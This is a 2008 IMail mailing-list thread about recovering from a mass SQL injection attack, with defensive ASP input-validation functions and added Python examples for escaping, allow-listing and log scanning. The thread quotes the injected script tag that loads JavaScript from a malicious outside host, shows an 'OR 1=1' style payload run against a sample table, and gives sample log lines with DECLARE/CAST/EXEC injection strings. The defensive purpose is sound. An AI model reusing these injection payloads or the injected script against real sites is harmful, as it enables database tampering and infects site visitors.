As a follow-up to #3, I had to write a quick function for someone today
who had so many different ORDER BY statements fed through the querystring
that he wanted something generic. Since SQL injection requires spaces
or special characters, it is easy to block using a simple function for
cases where you have ORDER BY and FROM statements, or anywhere else you
have unquoted strings fed by the querystring. As of last week, the SQL
injection hacker guy started specifically targeting these ORDER BY
statements, whereas before he was just targeting quoted string and
integer data.
' #==========================================================================#
' #  CleanSQL                                                                #
' #==========================================================================#
' # Purpose:   Returns a blank string for any value that contains characters #
' #            other than alphanumerics, periods, underscores and dashes.    #
' # Arguments: String that is about to be passed to a SQL command in         #
' #            unquoted format.                                              #
' # Returns:   Original or blank string.                                     #
' #==========================================================================#
Function CleanSQL(strValue)
    Dim regEx
    ' Match only alphanumeric characters plus period, underscore and dash,
    ' anchored to the whole value so nothing else can be smuggled in.
    Set regEx = New RegExp
    regEx.Global = True
    regEx.IgnoreCase = True
    regEx.Pattern = "^[a-z0-9\._\-]+$"
    If regEx.Test(strValue) = False Then
        CleanSQL = ""
    Else
        CleanSQL = strValue
    End If
    Set regEx = Nothing
End Function
Matt
Matt wrote:
Kevin,
Trust me when I say, "been there, done that". Don't do it. This guy
will come back and he has more than one trick up his sleeve that will
require you to be perfect.
The process is primarily three steps (mostly echoing Darin):
1) Do something like CInt to all integers (or other change-to
numerical data functions) for anything that is stored as a number
(not a string) in the database.
2) Escape every single quote with a double single quote for any
string data going to the database through the query.
3) For instances such as ORDER BY [column name] and SELECT FROM
[table name] where you are pulling values from the querystring,
you must validate that these values are one of the values that you
are expecting by using a long IF statement or something like
that. So if you only have columns named Height, Width, Length,
you must check that the querystring data only contains one of the
three. You could probably also write a function that checks the
data in regex and verifies that there are no non-alphanumeric
characters including spaces. This sort of technique would only
work for things like ORDER BY, SELECT FROM and don't forget to
check values like ASC and DESC if you do that sort of thing from
the querystring also.
Matt
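The three steps in Matt's reply, together with the CleanSQL function at the top of the thread, carried through as an added Python example (this is not Matt's ASP code and not anything from the list). It ports CleanSQL's regex, applies CInt-style integer conversion, single-quote doubling and an allow-list for the ORDER BY column and direction, then runs the unsafe and the hardened query against a constructed in-memory SQLite table. The "parts" table, its rows and the column names Height/Width/Length (the only ones Matt's post names) are assumptions for the illustration; SQLite stands in for SQL Server, and doubling a single quote is the same standard-SQL escape in both.

```python
import re
import sqlite3

# Assumed schema for the illustration: the post only names the columns
# Height, Width and Length, so those are the allow-listed ORDER BY targets.
ORDER_BY_COLUMNS = {"height", "width", "length"}
ORDER_BY_DIRECTIONS = {"ASC", "DESC"}

# Same character class as CleanSQL's "^[a-z0-9\._\-]+$" with IgnoreCase set.
_CLEAN_SQL = re.compile(r"[a-z0-9._-]+", re.IGNORECASE)


def clean_sql(value):
    """Port of CleanSQL: the value unchanged if it is only [A-Za-z0-9._-], else "".

    The dash is allowed, so a value such as "name--" passes this filter even
    though "--" starts a comment in T-SQL; for identifiers the allow-list in
    validate_order_by() is the stronger check.
    """
    return value if _CLEAN_SQL.fullmatch(value) else ""


def to_int(value):
    """Step 1 (CInt): numeric querystring data must parse as an integer or be rejected."""
    return int(value.strip())  # int() raises ValueError on "1 OR 1=1"


def escape_string(value):
    """Step 2: double every single quote so the value cannot terminate its own literal."""
    return value.replace("'", "''")


def validate_order_by(column, direction="ASC"):
    """Step 3: identifiers and ASC/DESC are unquoted, so they must match an allow-list."""
    col = column.strip().lower()
    dirn = direction.strip().upper()
    if col not in ORDER_BY_COLUMNS:
        raise ValueError(f"unexpected ORDER BY column: {column!r}")
    if dirn not in ORDER_BY_DIRECTIONS:
        raise ValueError(f"unexpected ORDER BY direction: {direction!r}")
    return col, dirn


def build_query_unsafe(name, min_height, order_col, order_dir):
    """The pattern that gets sites hit: raw querystring values concatenated into SQL."""
    return (f"SELECT name, height FROM parts WHERE name = '{name}' "
            f"AND height >= {min_height} ORDER BY {order_col} {order_dir}")


def build_query(name, min_height, order_col, order_dir):
    """The same query with the three steps applied to the querystring values."""
    col, dirn = validate_order_by(order_col, order_dir)
    return (f"SELECT name, height FROM parts WHERE name = '{escape_string(name)}' "
            f"AND height >= {to_int(min_height)} ORDER BY {col} {dirn}")


def run_on_sample_db(query):
    """Execute one query against a constructed in-memory table (rows made up here)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE parts (name TEXT, height INTEGER, width INTEGER, length INTEGER)")
    con.executemany("INSERT INTO parts VALUES (?, ?, ?, ?)",
                    [("bolt", 5, 1, 2), ("nut", 3, 1, 1), ("washer", 1, 4, 4)])
    try:
        return con.execute(query).fetchall()
    finally:
        con.close()


if __name__ == "__main__":
    payload = "x' OR '1'='1"
    print(run_on_sample_db(build_query_unsafe(payload, "0", "height", "ASC")))  # all three rows
    print(run_on_sample_db(build_query(payload, "0", "height", "ASC")))  # []
    print(run_on_sample_db(build_query("bolt", "4", "height", "DESC")))  # [('bolt', 5)]
```

With the raw concatenation the quote in the payload closes the string literal and the OR returns every row; with the quote doubled the same payload is compared as a literal name and matches nothing. For value positions a parameterised query (an ADO Command with parameters in classic ASP, the `?` placeholders in the SQLite insert above) is the more robust form of step 2, but no parameter mechanism can bind a column name or ASC/DESC, which is why step 3's allow-list stays necessary for ORDER BY.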
Kevin Rogers wrote:
Thanks for the advice. Yes, we are running a site that does allow
access to certain portions of the database, so I'm assuming we got
hit from that side. We'll see. We've added a function to catch the
injectors to all our web pages in an include file. Just wondering if
this would suffice. (If the function does match, we aren't currently
doing anything - just ending the page - do you have any suggestions
in that regard as well?)
pr_ValidateInputAll
function pr_ValidateInputAll()
    dim prReqName
    dim arToCompare
    redim arToCompare(2)
    ' Keywords to look for; each is only flagged when "table" follows it.
    arToCompare(0) = "drop"
    arToCompare(1) = "delete"
    arToCompare(2) = "update"
    ' Check every posted field and every querystring value.
    for each prReqName in Request.Form
        pr_ValidateInput Request.Form(prReqName), arToCompare
    next
    for each prReqName in Request.QueryString
        pr_ValidateInput Request.QueryString(prReqName), arToCompare
    next
end function

function pr_ValidateInput(sInput, arToCompare)
    dim nLen, nPos1, nPos2, i
    nLen = len(sInput)
    ' Only values longer than 15 characters are inspected.
    if nLen > 15 then
        ' Case-insensitive (compare mode 1 = vbTextCompare) search for VARCHAR anywhere in the value.
        if InStr(1, sInput, "VARCHAR", 1) > 0 then
            Response.End
        end if
        ' Flag "drop ... table", "delete ... table" and "update ... table".
        for i = LBound(arToCompare) to UBound(arToCompare)
            nPos1 = InStr(1, sInput, arToCompare(i), 1)
            if nPos1 > 0 then
                nPos2 = InStr(nPos1 + 1, sInput, "table", 1)
                if nPos2 > 0 and nPos2 > nPos1 then
                    Response.End
                end if
            end if
        next
    end if
end function
Darin Cox wrote:
Best way to find out is to grep all of your web server logs for
something like "VARCHAR(". That will tell you what pages are being
attacked.
After that, you'll have to check the source code of the individual
pages to see if they are vulnerable, and take appropriate steps to
patch them (quickly).
Darin.
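Darin's "grep the web server logs for VARCHAR(" step, as an added Python example (not Darin's or the list's code) that a practitioner can point at real IIS logs: it percent-decodes each request's querystring before matching, so encoded and double-encoded probes such as VARCHAR%284000%29 are not missed, and it tallies hits per page so the pages to audit first stand out. The sample log lines are constructed for the example in the W3C extended format IIS writes, with made-up hosts, pages and querystrings following the DECLARE ... VARCHAR(4000) ... CAST ... EXEC shape that Kevin's filter is looking for; the field layout (#Fields line with cs-uri-stem in position 5 and cs-uri-query in position 6) is an assumption and should be adjusted to the site's own log configuration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log (hosts, pages and querystrings made up for the example)
# in the W3C extended format IIS writes; the #Fields directive gives the layout.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-06-21 12:18:01 10.0.0.5 GET /products.asp id=12 200
2008-06-21 12:18:02 10.0.0.7 GET /products.asp id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x44%20AS%20VARCHAR(4000));EXEC(@S);-- 200
2008-06-21 12:18:03 10.0.0.7 GET /news.asp sort=title%3BDECLARE+%40S+VARCHAR%284000%29%3B-- 500
2008-06-21 12:18:04 10.0.0.7 GET /news.asp sort=title%253BDECLARE+%2540S+VARCHAR%25284000%2529%253B-- 500
2008-06-21 12:18:05 10.0.0.9 GET /default.asp - 200
"""

# Darin's grep target, made case-insensitive and tolerant of whitespace before "(".
SUSPECT = re.compile(r"VARCHAR\s*\(", re.IGNORECASE)


def fully_decode(text, rounds=3):
    """Percent-decode until the value stops changing, at most `rounds` times.

    A single decode misses double-encoded probes (%2528 -> %28 -> "("), so the
    decode is repeated; the bound keeps a pathological value from looping.
    """
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def parse_line(line):
    """Return (page, decoded querystring) for a data line, or None for directives/short lines."""
    if not line or line.startswith("#"):
        return None
    fields = line.split(" ")
    if len(fields) < 7:
        return None
    # Assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
    return fields[4], fully_decode(fields[5])


def hits_per_page(lines):
    """Count requests whose decoded querystring matches SUSPECT, keyed by page (cs-uri-stem)."""
    counts = Counter()
    for line in lines:
        parsed = parse_line(line.rstrip("\r\n"))
        if parsed and SUSPECT.search(parsed[1]):
            counts[parsed[0]] += 1
    return dict(counts)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            result = hits_per_page(fh)
    else:
        result = hits_per_page(SAMPLE_LOG.splitlines())
    for page, n in sorted(result.items(), key=lambda kv: -kv[1]):
        print(f"{n:5d}  {page}")
```

Run it with a log file path to scan real logs, or with no argument to see it flag two pages in the constructed sample. A hit only says a page was probed, not that it is vulnerable; as Darin says, the source of each flagged page still has to be read.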
----- Original Message ----- From: "Matt" <[EMAIL PROTECTED]>
To: <[email protected]>
Sent: Saturday, June 21, 2008 7:06 PM
Subject: Re: [IMail Forum] Coldwop
Oops, I misread this.
You were hacked using SQL injection from the Web side of things. I'm
not sure what interface was hit, but it could be that webmail is
vulnerable to this. There's a bunch on SANS about these attacks:
http://www.google.com/search?sourceid=mozclient&ie=utf-8&oe=utf-8&q=sql+injection+site%3Aisc%2Esans%2Eorg
My guess is that this is Storm Botnet originated stuff. They hack sites
through a very common coding vulnerability in database connected
websites, insert redirection code to an infected site, and when
unsuspecting users visit the intended site, they get infected by means
of one of many vulnerabilities in desktop apps that they target.
Your logs are showing the aftermath of having the bad data in there.
This will continue to happen over and over again until you patch
whatever is vulnerable. You either have some sort of custom site set up
that has access to this particular database, or it was hacked straight
through IMail's Web interfaces. I would love to know which one.
Matt
Kevin Rogers wrote:
Thanks Matt. I use an external SQL Server for Imail and all my users
had their USERDIR and MAILADDR and TIMEZONE fields changed to include
that coldwop.com javascript (e.g., "someuser" had their USERDIR set to
"d:\imail\someuser<script src=http://www.coldwop.com/b.js></script>")
I've fixed that. So what you're saying is that you don't think any
passwords have been compromised, but I've just been hit by the SQL
injector attacker?
Matt wrote:
This looks exactly like the SQL injection attacker from recent months
is trying to exploit a Postfix flaw by injecting into IMAP
interfaces. If this is causing you problems, it would seem that
IMail then isn't properly handling this bad data resulting in a
denial of service, though I strongly suspect that you are not
vulnerable otherwise. It could also be simply curious timing with
two different issues.
Matt
Kevin Rogers wrote:
Today our web mail application stopped working. Some users are
reporting IMAP issues as well. I've restarted all the services and
rebooted, but that hasn't helped. The error when entering web mail
is that there is an "illegal character in the path". When I checked
the syslog, I found thousands of entries like this:
06:21 12:18 SMTP-(4722016d00006d72) ERR MyDomain.com read open fail (d:\imail\RBG\myuser<script src=http://www.coldwop.com/b.js></script>\bulk.mbx)
06:21 12:18 SMTP-(46ed01d600006d40) ERR MyDomain.com read open fail (d:\imail\RBG\myuser<script src=http://www.coldwop.com/b.js></script>\main.mbx)
Coldwop.com apparently is a malicious site (my Trend Micro won't
even let me go there). Have I been hacked by them?
Anyone seen this?
I'm running Imail 9.23 on Windows Server 2003, all patches.
Thanks for your help.
Kevin
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html